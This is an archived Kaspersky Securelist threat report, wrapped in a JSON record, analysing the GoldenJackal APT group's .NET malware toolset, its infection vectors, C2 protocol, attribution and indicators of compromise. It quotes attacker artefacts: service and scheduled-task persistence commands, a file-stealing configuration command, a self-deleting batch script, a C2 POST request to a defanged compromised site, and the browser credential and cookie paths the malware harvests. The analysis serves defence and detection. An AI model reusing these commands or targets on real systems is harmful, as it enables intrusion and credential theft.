{ "id": "d234e472-4bdd-45d2-be3f-8d9e4d71b6a1", "created_at": "2026-04-06T00:21:47.768896Z", "updated_at": "2026-04-10T13:11:25.675408Z", "deleted_at": null, "sha1_hash": "99f08a2d3b149cfb0a3fde372f77fcfa66f5face", "title": "Meet the GoldenJackal APT group. Don’t expect any howls", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 291000, "plain_text": "Meet the GoldenJackal APT group. Don’t expect any howls\r\nBy Giampaolo Dedola\r\nPublished: 2023-05-23 · Archived: 2026-04-05 15:03:31 UTC\r\nGoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the\r\nMiddle East and South Asia. Despite the fact that they began their activities years ago, this group is generally\r\nunknown and, as far as we know, has not been publicly described.\r\nWe started monitoring the group in mid-2020 and have observed a constant level of activity that indicates a\r\ncapable and stealthy actor. The main feature of this group is a specific toolset of .NET malware, JackalControl,\r\nJackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher intended to:\r\ncontrol victim machines\r\nspread across systems using removable drives\r\nexfiltrate certain files from the infected system\r\nsteal credentials\r\ncollect information about the local system\r\ncollect information about users’ web activities\r\ntake screen captures of the desktop\r\nBased on their toolset and the attacker’s behaviour, we believe the actor’s primary motivation is espionage.\r\nInfection vectors\r\nWe have limited visibility on their infection vectors, but during our investigations, we observed the usage of fake\r\nSkype installers and malicious Word documents.\r\nThe fake Skype installer was a .NET executable file named skype32.exe that was approximately 400 MB in size.\r\nIt was a dropper containing two resources: the JackalControl Trojan and a legitimate Skype for business\r\nstandalone installer. This tool was used in 2020.\r\nThe other known infection vector was a malicious document that uses the remote template injection technique to\r\ndownload a malicious HTML page, which exploits the Follina vulnerability.\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 1 of 23\n\nMalicious document – first page\r\nThe document was named “Gallery of Officers Who Have Received National And Foreign Awards.docx” and\r\nappears as a legitimate circular distributed to collect information about officers decorated by Pakistan’s\r\ngovernment. It’s worth noting that the first description of the Follina vulnerability was published on May 29, 2022\r\nand this document appears to have been modified on June 1, two days after publication, and was first detected on\r\nJune 2.\r\nThe document was configured to load an external object from a legitimate and compromised website:\r\nhxxps://www.pak-developers[.]net/internal_data/templates/template.html!\r\nCode snippet used to load the remote resource\r\nThe remote webpage is a modified version of a public “Proof of Concept” to exploit the Follina vulnerability. The\r\noriginal PoC is available on GitHub. The attacker replaced the IT_BrowseForFile variable value with the\r\nfollowing:\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 2 of 23\n\nCode snippet used to exploit the Follina vulnerability\r\nThe decoded string is:\r\nDecoded script\r\nThe exploit downloads and executes an executable file hosted on the legitimate compromised website, and stores\r\nit in the following path: “%Temp%\\GoogleUpdateSetup.exe”. The downloaded file is the JackalControl malware.\r\nIn other cases, we do not have a real infection vector, but we observed a system compromised during lateral\r\nmovements. Specifically, we observed the attacker using the psexec utility to start a malicious batch script.\r\ncmd /c \"c:\\windows\\temp\\install.bat \u003e c:\\windows\\temp\\output.txt\"\r\nThe batch script performs a variety of actions, such as installing Microsoft .Net Framework 4, infecting the system\r\nwith the JackalControl Trojan, and collecting information about the system.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n$temp\\\\dnf4.exe /q /norestart\r\ntasklist\r\nsc qc \"WEvMngS\"\r\nsc stop \"WEvMngS\"\r\nsc delete \"WEvMngS\"\r\nsc create \"WEvMngS\" binpath= \"\\\"$windir\\WEvMngS.exe\\\" /1\" displayname= \"Windows\r\nEvent Manager\" type= own start= auto\"\r\nsc description \"WEvMngS\" \"Provides event-related methods that register routed\r\nevents.\"\r\nsc start \"WEvMngS\"\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 3 of 23\n\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\nschtasks /delete /f /tn \"\\Microsoft\\Windows\\Diagnosis\\Event Manager\"\r\nschtasks /create /f /tn \"\\Microsoft\\Windows\\Diagnosis\\Event Manager\" /xml\r\n\"$temp\\\\sch.xml\" /ru \"NT AUTHORITY\\SYSTEM\"\r\nsc qc \"WEvMngS\"\r\nschtasks /query /v /fo list /tn \"\\Microsoft\\Windows\\Diagnosis\\Event Manager\"\r\ntasklist\r\nnetstat -aon\r\nping -n 1 google.com\r\nipconfig /displaydns\r\nnetsh winhttp show proxy\r\nreg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" /v\r\nJackalControl\r\nThis is a Trojan that allows the attackers to remotely control the target machine through a set of predefined and\r\nsupported commands. These are received via an HTTPS communication channel facilitated between the malware\r\nand the C2 servers, and can instruct the implant to conduct any of the following operations:\r\nExecute an arbitrary program with provided arguments\r\nDownload arbitrary files to the local file system\r\nUpload arbitrary files from the local file system\r\nDuring the last few years, the attackers updated this tool multiple times and we observed multiple variants. We are\r\ngoing to describe the latest version, which was observed in January 2023\r\n(8C1070F188AE87FBA1148A3D791F2523).\r\nThe Trojan is an executable file that can be started as a standard program or as a Windows service.\r\nIt expects an argument, which can be equal to one of the following values:\r\n/0 : run as a standard program and contacts the C2 servers only once\r\n/1 : run as a standard program and contacts the C2 servers periodically\r\n/2 : run as a Windows service\r\nThe malware arguments and the related malware behavior change according to the variants. Some variants offer\r\nonly two arguments:\r\n/0 run as a standard program\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 4 of 23\n\n/1 run as a Windows service\r\nOther variants can install themselves with different persistence mechanisms. The malware’s execution flow is\r\ndetermined by the arguments provided in the command line with which it is run.\r\n/h0: will cause the malware to gain persistence by creating a Windows scheduled task.\r\n/h1: will cause the malware to gain persistence by creating a corresponding registry run key.\r\n/h2: will cause the malware to gain persistence by creating a Windows service.\r\n/r0: run as standard process (this argument is specified by the Windows scheduled task).\r\n/r1: run as standard process (this argument is specified by the generated registry run key value).\r\n/r2: run as a service (this argument is specified by the created Windows service).\r\nOver the years the attackers have distributed different variants: some include code to maintain persistence, others\r\nwere configured to run without infecting the system; and the infection procedure is usually performed by other\r\ncomponents, such as the batch script mentioned above.\r\nThe malware starts its activities by generating a BOT_ID that is a unique value used to identify the compromised\r\nsystem. This value is derived from several other host-based values:\r\nThe UUID value obtained from the following WMI query:\r\nselect * from win32_computersystemproduct\r\nThe machine GUID obtained from the following registry key:\r\nselect * from win32_computersystemproduct\r\nThe list of attached drives, obtained from another WMI query, which in turn allows them to determine the\r\n‘SerialNumber’ of ‘PHYSICALDRIVE0’:\r\nselect * from win32_diskdrive\r\nThe collected information is concatenated together in a byte array and then hashed with MD5, which is used as a\r\nseed for the creation of the BOT_ID. The algorithm used for the generation of the latter simply sums every two\r\nconsecutive bytes from the resulting MD5 hash and places the resulting byte (modulus 256) as a single byte of the\r\nfinal BOT_ID. This logic is described in the code snippet below, taken from the malware.\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 5 of 23\n\nCode snippet used to generate the BOT_ID\r\nThe resulting BOT_ID is used also to initialize the DES key and IV, which are then used to encrypt\r\ncommunication with the C2.\r\nThe malware communicates using HTTP POST requests where data arguments will be carried in encoded form as\r\npart of the request’s body. The overall request structure will then appear as follows:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\nPOST /wp-includes/class-wp-network-statistics.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101\r\nFirefox/68.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nContent-Type: multipart/form-data; boundary=----2c0272b325864985abf2677460a9b07a\r\nAccept-Language: en-GB,en;q=0.5\r\nUpgrade-Insecure-Requests: 1\r\nCache-Control: max-age=0, no-cache\r\nPragma: no-cache\r\nHost: finasteridehair[.]com\r\nContent-Length: 154\r\nExpect: 100-continue\r\n------2c0272b325864985abf2677460a9b07a\r\nContent-Disposition: form-data; name=\"adv\"\r\n%ENCODED_DATA%\r\n------2c0272b325864985abf2677460a9b07a\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 6 of 23\n\n18\r\nA valid response should in turn be formed in the following way:\r\n\u003c!-- DEBUGDATA::%ENCODED_DATA% --\u003e\r\nThe response is decoded with base64: the resulting payload is an array of strings, where the used delimiter is the\r\nstandard Windows new line sequence – “\\r\\n”. Each line is decoded again with base64, decrypted with DES, and\r\ndecompressed with the GZIP algorithm.\r\nEach command has the following structure:\r\nCommand structure\r\nThe command type must be equal to one of the following codes:\r\nCommand Description\r\n00\r\nExecute – Execute an arbitrary program with the specified arguments. If the attacker sets the\r\nNoWait flag to False, the malware redirects the process output, reads the data and forwards\r\nthem to the C2.\r\n01 Download – Read a file from the local system and upload it to the server.\r\n02 Upload – Save received data to the local system using the filepath specified by the attacker.\r\nThe Command Data field is intended to carry information on the command arguments and has a different structure\r\nfor each action type, as specified below:\r\nThe command results are usually composed into a message that also includes the values of the underlying\r\ncommand type and command ID, which uniquely identifies an instance of a command issued to the malware. The\r\nthree values are compressed with GZIP, encrypted with DES, and encoded with base64.\r\nThe resulting payload is concatenated with the BOT_ID using the “|” char, encoded again with base64, after which\r\nit gets uploaded to the remote server using the aforementioned POST request format.\r\nInstaller mode\r\nSome variants can infect the system, creating a copy of the malware in a specific location and guaranteeing its\r\npersistence.\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 7 of 23\n\nThe malware location is selected with a specific procedure. It enumerates all subdirectories in\r\nCommonApplicationData and randomly selects one to which its copy will be saved. The generated file name will\r\nbe suffixed with the subdirectory’s names and appended with another static value, Launcher.exe, as outlined\r\nbelow:\r\nSelected directory: C:\\ProgramData\\Windows App Certification Kit Launcher\r\nMalware copy: \"C:\\ProgramData\\Windows App Certification Kit\r\nLauncher\\WindowsAppCertificationKitLauncher.exe\"\r\nIf the operation succeeds, it also changes the new file timestamp and makes it the same as that of the selected\r\nsubdirectory.\r\nIf the operation fails, it randomly selects another directory and tries again to copy the malware.\r\nIf the operation fails with all subdirectories, it tries to use a list of hard-coded directory names:\r\nGoogle\r\nViber\r\nAdGuard\r\nWinZip\r\nWinRAR\r\nAdobe\r\nCyberLink\r\nIntel\r\nIf all the previous attempts fail, it tries to use the same procedure in the following locations:\r\nApplicationData\r\nLocalApplicationData\r\nTemp\r\nPersistence\r\nThe malware’s persistence is usually guaranteed with one of the following mechanisms:\r\nService installation\r\nCreation of a new Windows registry key value\r\nCreation of a new scheduled task.\r\nThe service is usually installed by the malware with the execution of the Windows sc.exe utility.\r\nsc create \"[MALWARE_NAME_NO_EXT]\" binpath= \"[MALWARE_FULL_PATH]\" /[ARGUMENT]\"\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 8 of 23\n\ndisplayname= \"WORKPATH\" type= own start= auto\r\nsc description \"[MALWARE_NAME_NO_EXT]\" \"This service keeps your installation up to date with the\r\nlatest enhancements and security fixes.\"\r\nsc start \"[MALWARE_NAME_NO_EXT]\"\r\nThe registry value is equal to the copied malware file name, without the extension, and is stored under the\r\nfollowing key:\r\nKey: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nValue name: \"[MALWARE_NAME_NO_EXT]\"\r\nValue data: \"[MALWARE_FULL_PATH] [ARGUMENT]\"\r\nThe scheduled task is created using a hard-coded XML template that is modified at runtime and dropped in the file\r\nsystem using the same malware file path, but with a different extension, .xml instead of .exe.\r\nThe generated XML file is then used with the Windows schtasks.exe utility to create the task.\r\nFor example:\r\nschtasks.exe /create /f /tn \"Adobe Update\" /xml\r\n\"C:\\ProgramData\\Adobe\\adobeupd.xml\"\r\nThe task and service description change according to the variant.\r\nJackalSteal\r\nJackalSteal is another implant usually deployed on a few compromised machines that is used to find files of\r\ninterest on the target’s system and exfiltrate them to the C2 server.\r\nThis tool can be used to monitor removable USB drives, remote shares, and all logical drives in the targeted\r\nsystem. The malware can work as a standard process or as a service. It cannot maintain persistence, so it must be\r\ninstalled by another component.\r\nJackalSteal starts its execution by parsing the arguments.\r\nOption Description\r\n-n a unique identifier value for the configured profile\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 9 of 23\n\n-p directory path to inspect\r\n-s maximum size of requested files\r\n-d number of days since the last write of the requested files\r\n-m\r\na comma-separated list of string masks to look for using a regular expression within the configured\r\ndirectory\r\n-w time interval in seconds between consecutive directory scans for the configured profile\r\n-e exclude path from the scanning activities\r\n/0 run as standard process\r\n/1 run as a service\r\nThese options allow the attacker to specify the ‘profile’, which defines what files are of interest to the attackers.\r\nThe profile consists of an ID and a list of patterns. Each pattern contains a list of options with the following\r\nproperties:\r\nProperty Description\r\nPath target paths\r\ncredentials user and password used to access a remote share\r\nMasks\r\nstring with wildcard and mask characters that can be used to match any set of files using a\r\nregular expression\r\nMaxSize maximum size of a file\r\nDays the number of days since the file was last written\r\nInterval the time interval between two consecutive path scans\r\nExclude paths that must be excluded during scanning activities\r\nThe command used to configure the JackalSteal component is as follows:\r\n%TEMP%\\\\setup01.exe -p all -p usb -e Windows -e \\\"Program Files*\\\" -e ProgramData -e\r\nUsers\\\\*\\\\AppData -e *\\\\AppData -s 15 -d 30 -w 3600 -m\r\n*.doc,*.docx,*.pdf,*.jpg,*.png,*.tif,*.tiff,*.txt,*.ppt,*.pptx,*.xls,*.xlsx -n 48df302a44c392eb\r\nThe unique identifier “–n” is usually the same BOT_ID generated by the JackalControl Trojan.\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 10 of 23\n\nAfter argument processing, the malware serializes the data in an XML, encrypts them with DES using a key\r\ngenerated from the ID passed with the “-n” option and stores the resulting payload in the following location:\r\n“%ApplicationData%\\SNMP\\cache\\%Filename%”, where %Filename% is a GUID generated from an MD5 of the\r\nunique identifier specified by the attacker.\r\nThe malware is usually executed with the “/0” or “/1” option and the “-n” option, which is used to load the\r\nobtained profile ID. In the second case, it loads the profile from the previously mentioned location and it starts the\r\n‘Watchers’.\r\nA Watcher is an object defined in a class with the same name that runs in a different thread and scans the location\r\naccording to the specified options. The pattern could represent:\r\na simple path in the local filesystem;\r\na path on a remote share;\r\nconstant string all;\r\nconstant string usb.\r\nWhen the pattern equals ‘all’, the malware enumerates all logical drives, and for each one it creates a new Watcher\r\nobject. When the pattern is ‘usb’, it listens for system events corresponding to the action of creating a new\r\nremovable drive on the system. When a new drive is detected, it creates a new Watcher object.\r\nEvery time a new Watcher is added, the malware notifies the log of the event and sends the information to the\r\nremote C2 using HTTP Post requests.\r\nThe log is created using the following string as a template:\r\nPath: {0}{1}\\r\\nMasks: {2}\\r\\nExclude: {3}\\r\\nDays: {4}\\r\\nMaxSize: {5}\\r\\nInterval: {6}\r\nAnd is uploaded inside an encrypted payload that contains the following information:\r\n|\u003cAES_Key,AES_IV\u003e\u003cAgent_id\\\\%yyyyMMddHHmmssfff%.log\u003e\u003cLog content\u003e|\r\nThe AES_Key and AES_IV are generated for each request and are encrypted with the RSA algorithm using a key\r\nembedded in the code. The resulting payload is also compressed with the GZIP algorithm.\r\nThe Agent_id\\\\Log_path.log and the Log content data are encrypted with the AES algorithm and compressed with\r\nGZIP.\r\nThe Watcher objects are responsible for scanning activities. When a Watcher starts, it enumerates all files in the\r\ndirectory and its subdirectories. The scanner can also resolve the .lnk links. When the scanner detects a file that\r\nmatches the defined properties (mask, days, max size, not in exclusions), it calculates the file content hash, checks\r\nif the resulting value is present in a hash table stored in the local cache directory and adds the value if not present.\r\nWhen a new file is detected, the malware uploads the file and the related filepath inside an encrypted payload\r\nusing the same logic described above.\r\nIn this case, the encrypted payload contains the following information:\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 11 of 23\n\n|\u003cAES_Key,AES_IV\u003e\u003cAgent_id\\\\Local_file_path\u003e\u003cFile content\u003e|\r\nThe Agent_id\\\\Local_file_path and the File content data are encrypted with the AES algorithm and compressed\r\nwith GZIP.\r\nJackalWorm\r\nThis worm was developed to spread and infect systems using removable USB drives. The program was designed\r\nas a flexible tool that can be used to infect systems with any malware.\r\nIts behavior changes according to the parent process.\r\nWhen the malware is working on a system that is already infected and the parent process is taskeng.exe or\r\nservices.exe:\r\n1. 1 Monitors removable USB drives\r\n2. 2 When a device is attached, hides the last-modified directory and replaces it with a copy of the worm\r\nThe code used to monitor removable USB drives is the same one observed in JackalSteal. It creates a\r\nManagementEventWatcher object, which allows it to subscribe to event notifications that correspond to a given\r\nWQL query and the issuing of a callback upon their interception. The query used by the malware instructs the\r\nsystem to check for a logical removable disk creation event every five seconds:\r\nselect * from __InstanceCreationEvent within 5 where TargetInstance ISA\r\n'Win32_LogicalDisk' and TargetInstance.DriveType = 2\r\nWhen the malware detects a removable USB storage device, it will copy itself onto it. The path it will copy to is\r\ndetermined by listing all directories and selecting the one that was modified last. It will create a copy of itself on\r\nthe drive root using the same directory name and change the directory’s attribute to “hidden”. This will result in\r\nthe actual directory being hidden and replaced with a copy of the malware with the directory name. Moreover,\r\nJackalWorm uses an icon mimicking a Windows directory, tricking the user into executing the malware when\r\ntrying to access a directory.\r\nIn the following example, the removable drive “E:” was infected by the malware, which copied itself as\r\nFolder1.exe and changed the attributes of Folder1 to hide it:\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 12 of 23\n\nInfected device\nWhen the malware starts on a clean system and the parent process is explorer.exe and the file is located in a\nremovable drive the behavior is as follows:\n1. 1 Opens the hidden directory\n2. 2 Performs the actions specified in the configuration files\n3. 3 Infects the system with the worm\nThe configuration files are embedded resources that contain XML data that can be used to instruct the worm to\nperform some actions:\nDrop a program and guarantee its persistence with a scheduled task\nDrop a program and execute it with the specified arguments\nExecute an existing program with the specified arguments\nA valid configuration file looks like this:\nIn this case, the worm was configured to install the PE file stored in another resource “rcdata02”, save it with the\nextension .exe and create a scheduled task to run it every 15 minutes.\nOther valid examples are:\nDrops the PE file stored in another resource “rcdata02” in “%TEMP%\\test.exe” and executes it.\nhttps://securelist.com/goldenjackal-apt-group/109677/\nPage 13 of 23\n\nExecutes the program “%WINDIR%\\system32\\ping.exe” with the argument “1.1.1.1”.\nIn our investigations, we observed only the first example and the malware was configured to install the\nJackalControl Trojan.\nThe installation procedure selects the malware location in much the same way as the procedure described in the\nsection above. It differs from the other one because it enumerates the subdirectories in CommonAppData only and\ncopies the file using the subdirectory’s names concatenated with another static value, upd.exe.\nIf it fails, it tries with a list of hard-coded directory names, which is a bit different from the procedure described\nabove.\nGoogle\nMozilla\nAdobe\nIntel\n[Random GUID]\nThe worm maintains its persistence by creating a scheduled task with a hard-coded XML template dynamically\nmodified at runtime. Once installed, the worm deletes itself from the removable drive by using a batch script. The\nscript is dropped in the local Temp directory with a random name:\n@echo off\n@chcp 65001\u003enul\n:check\n@tasklist | findstr /i \"%executingFilename%\" \u003enul\n@if %errorlevel%==0 goto check\n@del /f /q /a h \"%executingPath%\"\n@del /f /q \"%Temp%\\%randomname%.bat\"\nFuture removable drives that are attached will be re-infected with JackalWorm.\nIt is also worth mentioning that this tool seems to be under development. We deduced this by analyzing the\nembedded .NET resources of the file 5DE309466B2163958C2E12C7B02D8384. Their size is 193973 bytes,\nwhich is much bigger than their actual content:\nhttps://securelist.com/goldenjackal-apt-group/109677/\nPage 14 of 23\n\nRcdata01 – XML config – Size: 67 bytes\nRcdata02 – JackalControl Trojan – Size: 27136 bytes\nIt means there are 166770 bytes of unknown data. Most of them are part of the legitimate notepad.exe Windows\nutility, and specifically, the first 0x6A30 bytes were overwritten. After the legitimate notepad.exe image, we found\nalso the following XML configurations:\nThe first XML shows a new type value: ‘scheduler’, which is not specified in the code. The second XML shows\nthat this specific resource was used for testing purposes and the attacker was trying to run cmd.exe to write the\nword “TEST” in a text file in the desktop: %USERPROFILE%\\Desktop\\test.txt.\nJackalPerInfo\nThis malware was developed to collect information about the compromised system, as well as a specific set of\nfiles that could potentially be used to retrieve stored credentials and the user’s web activities. The attacker named\nit “perinfo”, a contraction of the program’s main class name PersonalInfoContainer.\nIts behaviour changes according to the number of arguments provided during execution. Specifically, when\nexecuted with only one argument, the malware collects a predefined set of information and stores it in a binary file\ncompressed with GZIP. The filename is specified in the argument provided. When executed with two arguments,\nthe malware uses the first argument to load a previously generated binary file and extract all the information to a\ndirectory specified by the second argument.\nBy default, the program should be executed with one argument. Once it is executed, the malware starts collecting\ninformation about the system using a specific function, GetSysInfo, which collects the following information:\n1\n2\n3\n4\n5\n6\nComputer name: %s\nOS version: %S\nDomain: %S\nUser: %S\nLocal time: %s\nInterfaces:\nhttps://securelist.com/goldenjackal-apt-group/109677/\nPage 15 of 23\n\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n%Interface Name%\r\n    DESC:\r\n    TYPE:\r\n    MAC:\r\n    IP:\r\n    GW:\r\n    DNS:\r\n    DHCP:\r\n    DOMAIN:\r\nRemote IP:\r\nCurrent directory:\r\nDrives:\r\n    C:\\ Fixed\r\n    D:\\ CDRom\r\n...\r\nApplications:\r\n    %Installed Application1%\r\n    %Installed Application2%\r\n...\r\nProcesses:\r\n    %Process Name 1%\r\n        Desc: %s\r\n        Name: %s\r\n        Path: %s\r\n    %Process Name 2%\r\n...\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 16 of 23\n\n33\r\nThis specific function was also observed in the first JackalControl variants, but was removed from newer variants.\r\nThe malware continues its operation by enumerating the logical drives on the system; and for each one it\r\nenumerates the files in the root path. The collected info includes the last write time, the filename, and the file size.\r\nIt then enumerates the Users directory in the system drive, usually C:\\Users\\. For each user, it enumerates the\r\ncontent of the following directories:\r\nDesktop\r\nDocuments\r\nDownloads\r\nAppData\\Roaming\\Microsoft\\Windows\\Recent\r\nIt tries also to acquire the following files:\r\nDesktop\\*.txt\r\nDocuments\\*.txt\r\nAppData\\Local\\Microsoft\\Windows\\WebCache\\*.log\r\nAppData\\Roaming\\Microsoft\\Windows\\Cookies\\*.txt\r\nAppData\\Local\\Google\\Chrome\\User Data\\*\\Bookmarks\r\nAppData\\Local\\Google\\Chrome\\User Data\\*\\Cookies\r\nAppData\\Local\\Google\\Chrome\\User Data\\*\\History\r\nAppData\\Local\\Google\\Chrome\\User Data\\*\\Login Data\r\nAppData\\Local\\Google\\Chrome\\User Data\\*\\Shortcuts\r\nAppData\\Local\\Google\\Chrome\\User Data\\*\\Web Data\r\nAppData\\Roaming\\Opera\\Opera\\*\\bookmarks.adr\r\nAppData\\Roaming\\Opera\\Opera\\*\\global_history.dat\r\nAppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*\\places.sqlite\r\nAppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*\\cookies.sqlite\r\nAppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*\\formhistory.sqlite\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 17 of 23\n\nThe malware attempts to steal credentials stored in the victim’s browser databases, as well as other information\r\nsuch as cookies that could be used to gain access to web services.\r\nFinally, it serializes the collected information to a binary format, compresses all the data with the GZIP algorithm,\r\nand stores everything in the file specified with the first argument provided by the attacker.\r\nJackalScreenWatcher\r\nThis tool is used to collect screenshots of the victim’s desktop and sends the pictures to a remote, hard-coded C2\r\nserver:\r\nhxxps://tahaherbal[.]ir/wp-includes/class-wp-http-iwr-client.php\r\nThis specific webpage was also used as a C2 for the JackalSteal component, indicating that the tools are probably\r\npart of a unique framework.\r\nThe malware can handle some arguments that are optional and can be provided as input:\r\n-r resolution ratio (default 1.0)\r\n-i interval (default 10 seconds)\r\n-n specify a custom agent id. By default, this value is equal to: %Hostname%\\%Username%\r\nThe program’s primary function involves running a thread that scans all displays on the system, checking their\r\ndimensions. It then starts an infinite loop, periodically checking if the user is active on the system. Whenever the\r\nmalware detects user activity, it captures a screenshot and sends it to the remote server.\r\nUser activity is detected by monitoring the cursor’s position and checking if it has changed since the last recorded\r\nposition. After uploading a screenshot, it waits for a specified interval before restarting the loop.\r\nThe screenshots are uploaded inside an encrypted payload using HTTP Post requests.\r\nThe encrypted payload is similar to that used by JackalSteal and contains the following information:\r\n|\u003cAES_Key,AES_IV\u003e\u003cRemote filename\u003e\u003cScreenshot\u003e|\r\nAES_Key and AES_IV are encrypted with the RSA algorithm using a key embedded in the code. The resulting\r\npayload is also compressed with the GZIP algorithm.\r\nThe Remote filename and Screenshot data are encrypted with the AES algorithm and compressed with GZIP. The\r\nRSA key is the same as that observed in other JackalSteal components.\r\nInfrastructure\r\nGoldenJackal activity is characterized by the use of compromised WordPress websites as a method to host C2-\r\nrelated logic. We believe the attackers upload a malicious PHP file that is used as a relay to forward web requests\r\nto another backbone C2 server.\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 18 of 23\n\nWe don’t have any evidence of the vulnerabilities used to compromise the sites. However, we did observe that\nmany of the websites were using obsolete versions of WordPress and some had also been defaced or infected with\npreviously uploaded web shells, likely as a result of low-key hacktivist or cybercriminal activity. For this reason,\nwe assess that the vulnerabilities used to breach these websites are known ones rather than 0-days.\nThe remote webpage usually replies with a fake “Not Found” page. The HTTP response status code is “200”, but\nthe HTTP body shows a “Not found” webpage.\n\n404 Not Found\n\n# Not Found\n\nThe requested URL %FILE PATH% was not found on this server.\n\n---\n%SERVER% In specific cases, the attacker provides a valid response with a list of commands. In those cases, the previous body\nis followed by a long list of standard Windows new line sequences – “\\r\\n” – and finally the previously mentioned\ndelimiter:\nVictims\nOver the years, we have observed a limited number of attacks against government and diplomatic entities in the\nMiddle East and South Asia. We observed victims in: Afghanistan, Azerbaijan, Iran, Iraq, Pakistan and Turkey.\nhttps://securelist.com/goldenjackal-apt-group/109677/\nPage 19 of 23\n\nGeography of victims\r\nAttribution\r\nWe are unable to link GoldenJackal to any known actor.\r\nDuring our investigations, we observed some similarities between GoldenJackal and Turla. Specifically, we\r\nnoticed a code similarity in the victim UID generation algorithm that overlaps somewhat with that used by\r\nKazuar.\r\nSpecifically, Kazuar gets the MD5 hash of a predefined string and then XORs it with a four-byte unique “seed”\r\nfrom the machine. The seed is obtained by fetching the serial number of the volume where the operating system is\r\ninstalled.\r\npublic static Guid md5_plus_xor(string string_0) {\r\n  byte[] bytes = BitConverter.GetBytes(parameter_class.unique_pc_identifier);\r\n  byte[] array = MD5.Create().ComputeHash(get_bytes_wrapper(string_0));\r\nfor (int i = 0; i \u003c array.Length; i++) {\r\n    byte[] array2 = array;\r\n    int num = i;\r\n    array2[num] ^= bytes[i % bytes.Length];\r\n  }\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 20 of 23\n\nreturn new Guid(array);\r\n}\r\nJackalControl uses an MD5+SHIFT algorithm. It collects a set of information from the machine, including the\r\nserial number of the volume where the operating system is installed, to generate a unique seed with the MD5\r\nalgorithm. Then it uses the resulting byte array, summing every two consecutive bytes from the resulting MD5\r\nhash and placing the resulting bytes (modulus 256) as the sequence that constructs the final BOT_ID.\r\nCode snippet used to generate the BOT_ID\r\nMoreover, the use of tools developed in .NET and of compromised WordPress websites as C2 is a common Turla\r\nTTP.\r\nLast but not least, the groups share an interest in the same targets, and in one specific case we observed that a\r\nvictim machine was infected with a Turla artifact two months before the GoldenJackal infection.\r\nDespite these similarities, we assessed with low confidence that there is a connection between GoldenJackal and\r\nTurla, since neither of these is unique to either threat actor. The use of compromised WordPress websites is not a\r\nunique TTP. This technique was also observed in activity by other groups such as BlackShadow, another APT\r\nactive in the Middle East that uses .NET malware. The code similarities are related to a single function in a .NET\r\nprogram that could be easily copied with a decompiler. It is possible that GoldenJackal used that algorithm as a\r\nfalse flag. Another hypothesis is that the developers behind JackalControl were inspired by Turla and decided to\r\nreplicate the UID generation algorithm. Finally, the shared interest in the same targets is easily explained by the\r\nfact that the victims are high-profile targets that could be considered interesting by different actors.\r\nConclusions\r\nGoldenJackal is an interesting APT actor that tries to keep a low profile. Despite its long-term activities, which are\r\nbelieved to have started in June 2019, this group and the related samples are still generally unknown.\r\nThe group is probably trying to reduce its visibility by limiting the number of victims. According to our telemetry,\r\nthe number of targets is very low and most of them were related to government or diplomatic entities. Moreover,\r\nsome of the samples were deployed only on systems that were not protected by Kaspersky during the infection\r\nphase. This may indicate that the actor is trying to protect some of its tools and avoid specific security solutions.\r\nTheir toolkit seems to be under development – the number of variants shows that they are still investing in it. The\r\nlatest malware, JackalWorm, appeared in the second half of 2022 and appears to still be in the testing phase. This\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 21 of 23\n\ntool was unexpected because in previous years the attacks were limited to a small group of high-profile entities,\r\nand a tool like JackalWorm is probably difficult to bind and can easily get out of control.\r\nMore information about GoldenJackal, including IoCs and YARA rules, are available to customers of the\r\nKaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.\r\nIndicators of compromise\r\nMD5 hashes\r\nJackalControl\r\n5ed498f9ad6e74442b9b6fe289d9feb3\r\na5ad15a9115a60f15b7796bc717a471d\r\nc6e5c8bd7c066008178bc1fb19437763\r\n4f041937da7748ebf6d0bbc44f1373c9\r\neab4f3a69b2d30b16df3d780d689794c\r\n8c1070f188ae87fba1148a3d791f2523\r\nJackalSteal\r\nc05999b9390a3d8f4086f6074a592bc2\r\nJackalWorm\r\n5de309466b2163958c2e12c7b02d8384\r\nJackalPerInfo\r\na491aefb659d2952002ef20ae98d7465\r\nJackalScreenWatcher\r\n1072bfeee89e369a9355819ffa39ad20\r\nLegitimate compromised websites\r\nJackalControl 